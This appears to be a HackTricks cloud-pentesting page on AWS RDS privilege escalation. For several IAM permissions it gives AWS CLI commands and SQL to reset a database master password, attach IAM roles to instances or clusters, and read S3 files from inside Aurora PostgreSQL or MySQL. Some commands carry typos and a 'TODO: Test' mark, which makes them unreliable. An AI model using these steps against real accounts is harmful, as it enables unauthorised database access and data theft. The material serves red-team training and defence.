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AWS - RDS Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

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RDS - Relational Database Service

For more information about RDS check:

{% content-ref url="../aws-services/" %} {% endcontent-ref %}


With that permission an attacker can modify the password of the master user, and the login inside the database:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
    --db-instance-identifier <db-id> \
    --master-user-password 'Llaody2f6.123' \

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

{% hint style="warning" %} You will need to be able to contact to the database (they are usually only accessible from inside networks). {% endhint %}

Potential Impact: Find sensitive info inside the databases.


According to the docs a user with this permission could connect to the DB instance.

Abuse RDS Role IAM permissions

Postgresql (Aurora)

{% hint style="success" %} If running SELECT datname FROM pg_database; you find a database called rdsadmin you know you are inside an AWS postgresql database. {% endhint %}

First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions:

SELECT * FROM pg_extension;

If you find something like aws_s3 you can assume this database has some kind of access over S3 (there are other extensions such as aws_ml and aws_lambda).

Also, if you have permissions to run aws rds describe-db-clusters you can see there if the cluster has any IAM Role attached in the field AssociatedRoles. If any, you can assume that the database was prepared to access other AWS services. Based on the name of the role (or if you can get the permissions of the role) you could guess what extra access the database has.

Now, to read a file inside a bucket you need to know the full path. You can read it with:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
   'test1234567890678', // Name of the bucket
   'data.csv',          // Name of the file
   'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table

If you had raw AWS credentials you could also use them to access S3 data with:

SELECT aws_s3.table_import_from_s3(
   't', '', '(format csv)',
   aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')

{% hint style="info" %} Postgresql doesn't need to change any parameter group variable to be able to access S3. {% endhint %}

Mysql (Aurora)

{% hint style="success" %} Inside a mysql, if you run the query SELECT User, Host FROM mysql.user; and there is a user called rdsadmin, you can assume you are inside an AWS RDS mysql db. {% endhint %}

Inside the mysql run show variables; and if the variables such as aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, have values, you can assume the database is prepared to access S3 data.

Also, if you have permissions to run aws rds describe-db-clusters you can check if the cluster has any associated role, which usually means access to AWS services).

Now, to read a file inside a bucket you need to know the full path. You can read it with:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;

rds:AddRoleToDBCluster, iam:PassRole

An attacker with the permissions rds:AddRoleToDBCluster and iam:PassRole can add a specified role to an existing RDS instance. This could allow the attacker to access sensitive data or modify the data within the instance.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potential Impact: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also.


Just with this permission an attacker could create a new instance inside a cluster that already exists and has an IAM role attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
    --db-instance-identifier mydbinstance2 \
    --db-instance-class db.t3.medium \
    --engine aurora-postgresql \
    --db-cluster-identifier database-1 \
    --db-security-groups "string" \

rds:CreateDBInstance, iam:PassRole

{% hint style="info" %} TODO: Test {% endhint %}

An attacker with the permissions rds:CreateDBInstance and iam:PassRole can create a new RDS instance with a specified role attached. The attacker can then potentially access sensitive data or modify the data within the instance.

{% hint style="warning" %} Some requirements of the role/instance-profile to attach (from here):

  • The profile must exist in your account.
  • The profile must have an IAM role that Amazon EC2 has permissions to assume.
  • The instance profile name and the associated IAM role name must start with the prefix AWSRDSCustom . {% endhint %}

{% code overflow="wrap" %}

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

{% endcode %}

Potential Impact: Access to sensitive data or unauthorized modifications to the data in the RDS instance.

rds:AddRoleToDBInstance, iam:PassRole

An attacker with the permissions rds:AddRoleToDBInstance and iam:PassRole can add a specified role to an existing RDS instance. This could allow the attacker to access sensitive data or modify the data within the instance.

{% hint style="warning" %} The DB instance must be outside of a cluster for this {% endhint %}

{% code overflow="wrap" %}

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

{% endcode %}

Potential Impact: Access to sensitive data or unauthorized modifications to the data in the RDS instance.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

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